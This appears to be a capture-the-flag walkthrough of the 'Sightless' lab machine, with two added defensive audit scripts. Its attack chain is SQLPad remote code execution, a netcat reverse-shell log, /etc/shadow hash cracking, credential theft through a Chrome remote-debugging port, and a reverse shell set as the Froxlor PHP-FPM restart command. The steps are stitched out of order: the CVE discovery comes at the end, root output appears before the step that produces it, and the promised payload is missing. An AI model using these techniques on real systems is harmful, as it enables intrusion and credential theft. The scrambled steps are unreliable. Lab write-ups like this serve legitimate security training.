nmap -sC -sV -vv 10.10.11.32
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (sightless.htb FTP Server) [::ffff:10.10.11.32]
| Invalid command: try being more creative
|_ Invalid command: try being more creative
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 c9:6e:3b:8f:c6:03:29:05:e5:a0:ca:00:90:c9:5c:52 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGoivagBalUNqQKPAE2WFpkFMj+vKwO9D3RiUUxsnkBNKXp5ql1R+kvjG89Iknc24EDKuRWDzEivKXYrZJE9fxg=
| 256 9b:de:3a:27:77:3b:1b:e1:19:5f:16:11:be:70:e0:56 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA4BBc5R8qY5gFPDOqODeLBteW5rxF+qR5j36q9mO+bu
80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://sightless.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
We see FTP, SSH (which tells us it's an Ubuntu server), and HTTP on nginx redirecting us to "sightless.htb", so let's add it to the /etc/hosts file and check the website.
Scrolling down to this section, we see the SQLPad entry, which redirects us to a new virtual host "sqlpad.sightless.htb", so let's add that too and check it.
First we create a connection in the website, then click "Test" and intercept the request in Burp.
Exploitation
Then in Burp, we will add a new "data" parameter and make the POST data like:
Checking our listener, we get a shell as root, but we are inside a Docker container:
nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.16.26] from (UNKNOWN) [10.10.11.32] 43514
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@c184118df0a6:/var/lib/sqlpad#
Enumerating around the container, we see a user called "michael". Since we have root access we can read "/etc/shadow", take his password hash and try to crack it.
Loading his hash into John, we crack it easily and log in via SSH.
john --show michael.hash
?:insanec<REDACTED>
1 password hash cracked, 0 left
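The step above works because a hash read out of the container's /etc/shadow is also the password of a host account. As an added audit helper (not part of the writeup), the script below parses shadow(5)-style records, reports accounts that are login-capable (and so exposed to exactly this offline guessing if the file leaks) and flags legacy hash algorithms that make such guessing cheap. Every hash string in the sample is a constructed placeholder; the check only looks at the algorithm prefix.

```python
"""Audit /etc/shadow-style records: which accounts carry a real password hash
(in scope for offline cracking if the file is ever read), and which of those use
a legacy algorithm. Added example with constructed input, not from the writeup."""
from dataclasses import dataclass

# Constructed sample in shadow(5) layout:
# name:hash:lastchange:min:max:warn:inactive:expire:reserved
SHADOW_SAMPLE = """\
root:$y$j9T$SALTSALTSALTSALT$CONSTRUCTEDYESCRYPTHASH:19700:0:99999:7:::
michael:$6$SALTSALT$CONSTRUCTEDSHA512CRYPTHASH:19700:0:99999:7:::
legacy:$1$SALTSALT$CONSTRUCTEDMD5CRYPTHASH:18000:0:99999:7:::
nopass::19700:0:99999:7:::
nobody:*:19700:0:99999:7:::
sshd:!:19700:0:99999:7:::
"""

# crypt(3) prefixes -> algorithm name
ALGORITHMS = {
    "$y$": "yescrypt", "$gy$": "gost-yescrypt", "$7$": "scrypt",
    "$2b$": "bcrypt", "$2y$": "bcrypt", "$2a$": "bcrypt",
    "$6$": "sha512crypt", "$5$": "sha256crypt", "$1$": "md5crypt",
}
# Fast to brute-force on commodity GPUs, whatever the password quality.
LEGACY = {"md5crypt", "descrypt"}


@dataclass(frozen=True)
class Account:
    name: str
    algorithm: str       # algorithm name, "locked", "empty" or "unknown"
    login_capable: bool  # False only for "!"/"*" locked entries


def classify_hash(field):
    """Return (algorithm, login_capable) for one shadow password field."""
    if field == "":
        return "empty", True          # no password required at all
    if field.startswith(("!", "*")):
        return "locked", False
    for prefix, name in ALGORITHMS.items():
        if field.startswith(prefix):
            return name, True
    if len(field) == 13 and "$" not in field:
        return "descrypt", True       # traditional DES crypt, 8-char limit
    return "unknown", True


def parse_shadow(text):
    accounts = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue
        algorithm, capable = classify_hash(fields[1])
        accounts.append(Account(fields[0], algorithm, capable))
    return accounts


def password_accounts(text=SHADOW_SAMPLE):
    """Names whose hash would be subject to offline guessing if the file leaked."""
    return [a.name for a in parse_shadow(text) if a.login_capable and a.algorithm != "empty"]


def audit(text=SHADOW_SAMPLE):
    """Findings that need action regardless of password strength."""
    findings = {}
    for acct in parse_shadow(text):
        if acct.algorithm == "empty":
            findings[acct.name] = "no password set"
        elif acct.algorithm in LEGACY:
            findings[acct.name] = f"legacy hash ({acct.algorithm})"
    return findings


if __name__ == "__main__":
    print("password accounts:", ", ".join(password_accounts()))
    for name, problem in audit().items():
        print(f"{name}: {problem}")
```

Run it as root against the real file with `audit(open("/etc/shadow").read())`. The accounts listed by `password_accounts` are the ones where password quality (and reuse between a container image and the host, as seen here) decides how long John needs.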
Accessing the server via SSH, we get user.txt:
michael@sightless:~$ wc -c user.txt
33 user.txt
ROOT
Enumerating the machine, we find port 8080 listening locally.
michael@sightless:~$ ss -natpl
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
<SNIP>
LISTEN 0 511 127.0.0.1:8080 0.0.0.0:*
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:40535 0.0.0.0:*
<SNIP>
Forwarding it to our box using SSH so we can access it like so:
ssh -L 8080:127.0.0.1:8080 michael@sightless.htb
Now, going to localhost:8080 on our box, we see a Froxlor instance:
Trying the old credentials we have, none of them work. Upon further enumeration on the box, by monitoring the processes, we see a Chrome debug port being used. Checking the internal ports again and trying the ports in the 40000 range, we can access the debug port.
Then, opening a Chromium-based browser, we go to "chrome://inspect", click "Configure", and add the host and port we have:
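The two host-side observations above (a service bound only to loopback, and a browser process started with a DevTools remote-debugging port) are the kind of thing a periodic host audit should surface before anyone else does. The script below is an added example, not part of the writeup: it parses `ss -natpl` output together with `ps -eo pid,args` command lines and classifies each listener. All input is constructed sample data; the Process column, the port numbers and the PIDs are invented for the demo and are only populated by `ss` when it is run as the process owner or root.

```python
"""Audit helper: pair `ss -natpl` output with process command lines to flag
loopback-only listeners and DevTools remote-debugging endpoints.
Added example with constructed sample data, not from the writeup."""
import re
from dataclasses import dataclass

# Constructed: `ss -natpl` as seen by the process owner (Process column filled).
SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      511    127.0.0.1:8080      0.0.0.0:*
LISTEN 0      4096   127.0.0.53%lo:53    0.0.0.0:*
LISTEN 0      4096   127.0.0.1:40535     0.0.0.0:*   users:(("chrome",pid=1337,fd=20))
LISTEN 0      10     127.0.0.1:9222      0.0.0.0:*   users:(("chrome",pid=2048,fd=20))
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*
"""

# Constructed: `ps -eo pid,args`. pid 1337 let Chrome pick a free port
# (--remote-debugging-port=0); pid 2048 pinned one explicitly.
PS_OUTPUT = """\
PID ARGS
1 /sbin/init
1337 /usr/bin/chrome --headless --remote-debugging-port=0 http://localhost:8080
2048 /usr/bin/chrome --headless --remote-debugging-port=9222
2222 nginx: master process
"""

SS_LINE = re.compile(r"^LISTEN\s+\d+\s+\d+\s+(\S+)\s+\S+\s*(.*)$")
PID_IN_PROCESS = re.compile(r"pid=(\d+)")
DEBUG_FLAG = re.compile(r"--remote-debugging-port=(\d+)")
LOOPBACK = ("127.", "[::1]")


@dataclass(frozen=True)
class Listener:
    addr: str
    port: int
    loopback_only: bool
    pids: frozenset


def parse_ss(text):
    """One Listener per LISTEN line; interface scope ids such as %lo are dropped."""
    listeners = []
    for line in text.splitlines():
        m = SS_LINE.match(line)
        if not m:
            continue
        addr, _, port = m.group(1).rpartition(":")
        addr = addr.split("%")[0]
        pids = frozenset(int(p) for p in PID_IN_PROCESS.findall(m.group(2)))
        listeners.append(Listener(addr, int(port), addr.startswith(LOOPBACK), pids))
    return listeners


def find_debug_ports(ps_text):
    """Map pid -> requested DevTools port (0 means the browser chose one itself)."""
    ports = {}
    for line in ps_text.splitlines()[1:]:
        pid, _, args = line.partition(" ")
        m = DEBUG_FLAG.search(args)
        if m:
            ports[int(pid)] = int(m.group(1))
    return ports


def audit(ss_text=SS_OUTPUT, ps_text=PS_OUTPUT):
    """Classify listeners; a DevTools endpoint outranks plain loopback-only."""
    debug = find_debug_ports(ps_text)
    pinned = {port for port in debug.values() if port}
    random_port_pids = {pid for pid, port in debug.items() if port == 0}
    verdict = {}
    for lst in parse_ss(ss_text):
        # A port chosen by the browser is matched through the owning pid,
        # a pinned port directly by number.
        if lst.port in pinned or lst.pids & random_port_pids:
            verdict[lst.port] = "devtools-remote-debugging"
        elif lst.loopback_only:
            verdict[lst.port] = "loopback-only"
    return verdict


if __name__ == "__main__":
    for port, kind in sorted(audit().items()):
        print(f"{port:>6}  {kind}")
```

Loopback-only services are reachable by any local account that can open an SSH tunnel, so "bound to 127.0.0.1" is not an access control; a DevTools endpoint additionally hands over every request the browser makes, credentials included, which is why the random-port case is matched through the pid rather than ignored.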
Clicking "Done" then we can see:
Inspecting it, we can see requests being made to the Froxlor website; checking the Network tab, we can see it logging in, and we can get the admin password.
And we get access to the admin dashboard.
root@sightless:~# ls
ls
docker-volumes
root.txt
scripts
root@sightless:~# wc -c root.txt
wc -c root.txt
33 root.txt
We see an instance of SQLPad running; googling around, we find a CVE for it that gives us RCE via the "api/test-connection" endpoint. If you wish you can use a GitHub repo for it, but I will be doing the exploit manually in Burp Suite.
Going to the PHP-FPM configuration tab, we can edit the restart command (""), so we make a bash one-liner reverse shell and set the restart command to "bash /tmp/vamp.sh". After that we restart PHP-FPM from the system configuration tab, and we get a reverse shell on our listener: